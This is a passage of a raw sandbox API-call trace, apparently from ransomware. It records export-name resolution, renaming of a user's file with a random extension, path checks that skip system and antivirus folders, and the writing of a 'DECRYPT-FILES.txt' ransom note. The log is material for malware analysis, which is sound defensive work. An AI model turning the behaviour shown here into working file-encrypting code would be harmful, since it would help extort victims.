lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.153] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.153] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.153] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.153] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.153] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.153] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.153] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.153] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.153] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.153] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.153] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.153] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.153] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.153] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.153] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.153] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.153] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.154] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.154] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.154] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.154] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.154] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.154] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.154] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.154] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.154] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.154] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.154] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.154] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.154] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.154] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.154] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.154] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.154] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.154] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.154] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.155] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.155] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.155] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.155] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.155] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.155] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.155] lstrlenA (lpString="DELETEATOM") returned 10 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.155] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.155] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.155] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.155] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.155] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.155] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.155] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.155] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.155] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.155] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.155] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.155] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.155] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.156] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.156] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.156] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.156] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.156] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.156] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.156] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.156] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.156] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.156] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.156] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.156] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.156] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.156] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.156] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.156] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.156] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.156] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.156] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.156] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.157] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.157] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.157] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.157] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.157] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.157] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.157] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.157] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.157] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.157] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.157] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.157] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png") returned 71 [0083.157] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png.UZMgvg") returned 78 [0083.157] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\jnbb69otwfqllue9cnu.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\JnbB69OtwfqlLuE9CNu.png.UZMgvg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\jnbb69otwfqllue9cnu.png.uzmgvg"), dwFlags=0x0) returned 1 [0083.158] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.158] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.158] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.158] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d3dc7e0, ftCreationTime.dwHighDateTime=0x1d4c92a, ftLastAccessTime.dwLowDateTime=0x7fa28fc0, ftLastAccessTime.dwHighDateTime=0x1d4d55a, ftLastWriteTime.dwLowDateTime=0x7fa28fc0, ftLastWriteTime.dwHighDateTime=0x1d4d55a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SzbeVm7vdK3sHvH", cAlternateFileName="SZBEVM~1")) returned 1 [0083.159] lstrcmpW (lpString1="SzbeVm7vdK3sHvH", lpString2=".") returned 1 [0083.159] lstrcmpW (lpString1="SzbeVm7vdK3sHvH", lpString2="..") returned 1 [0083.159] lstrcatW (in: lpString1="SzbeVm7vdK3sHvH", lpString2="\\" | out: lpString1="SzbeVm7vdK3sHvH\\") returned="SzbeVm7vdK3sHvH\\" [0083.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="SzbeVm7vdK3sHvH\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\" [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Program Files") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch=":\\Windows") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Games\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Tor Browser\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\ProgramData\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\All Users") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\IETldCache\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\Local Settings\\") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="\\AppData\\Local") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="AhnLab") returned 0x0 [0083.159] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0083.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0083.159] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.159] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\jkbimi8.tmp") returned 76 [0083.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0083.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0083.159] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0083.159] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\DECRYPT-FILES.txt") returned 82 [0083.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0083.162] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0083.163] CloseHandle (hObject=0x444) returned 1 [0083.163] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\") returned 64 [0083.163] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\*" [0083.163] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d3dc7e0, ftCreationTime.dwHighDateTime=0x1d4c92a, ftLastAccessTime.dwLowDateTime=0xadc22b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadc22b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0083.163] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.163] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d3dc7e0, ftCreationTime.dwHighDateTime=0x1d4c92a, ftLastAccessTime.dwLowDateTime=0xadc22b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, 